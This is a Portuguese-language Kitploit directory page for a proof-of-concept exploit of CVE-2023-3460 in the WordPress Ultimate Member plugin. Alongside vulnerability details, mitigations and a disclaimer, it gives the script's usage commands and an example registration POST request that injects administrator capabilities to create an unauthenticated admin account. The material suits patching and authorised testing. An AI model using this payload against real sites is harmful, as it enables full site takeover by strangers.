Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-3460 — Prova de conceito de exploit para CVE-2023-3460, uma vulnerabilidade de escalonamento de privilégios no WordPress Ultimate Member. Cria uma conta de administrador por meio de uma solicitação de registro manipulada. Apenas para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/gurjotexpert/cve-2023-3460
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubgurjotexpert/cve-2023-3460

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-3460

Prova de conceito de exploit para CVE-2023-3460, uma vulnerabilidade de escalonamento de privilégios no WordPress Ultimate Member. Cria uma conta de administrador por meio de uma solicitação de registro manipulada. Apenas para testes autorizados.

Ver Repositório
11há 1 anoAinda não revisado

🚨 CVE-2023-3460 - Exploração de Escalação de Privilégios no Ultimate Member do WordPress

Este é um exploit de prova de conceito (PoC) para CVE-2023-3460, uma vulnerabilidade crítica no plugin do WordPress Ultimate Member. Ele permite que usuários não autenticados escalem seus privilégios para Administrador ao elaborar uma solicitação de registro maliciosa.

🔥 Impacto: Comprometimento total do site por meio da criação não autorizada de conta de administrador.


📌 Detalhes da Vulnerabilidade

  • Plugin Afetado: Ultimate Member
  • Versões Afetadas: ≤ 2.6.6
  • Versão Corrigida: 2.6.7
  • Tipo de Exploit: Escalação de Privilégios via Abuso de Registro
  • Autenticação Necessária: ❌ Não
  • CVE: CVE-2023-3460

⚙️ Requisitos

  • Python 3
  • biblioteca requests
  • biblioteca urllib3
  • biblioteca beautifulsoup4

Instale os requisitos:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Uso do Exploit

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Exemplo:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Recursos do Script Exploit

  • Obtém o nonce CSRF (_wpnonce) da página de registro
  • Contorna a validação do formulário
  • Injeta wp_capabilities com a função administrator
  • Cria um novo usuário administrador sem autenticação

🔐 Exemplo de Payload do Exploit

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Mitigação

  • Atualize o plugin Ultimate Member para v2.6.7 ou superior
  • Desative o registro aberto se não for necessário
  • Monitore os logs de criação de usuários em busca de atividades suspeitas

📚 Referências

  • 🔗 Aviso da Patchstack
  • 🔗 CVE-2023-3460 no NVD

⚠️ Aviso Legal

Este script é fornecido apenas para fins educacionais e de testes autorizados. A exploração não autorizada de sistemas é ilegal e antiética. Use-o somente em sistemas que você possui ou tem permissão para testar.


👨‍💻 Autor

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Baixar ferramenta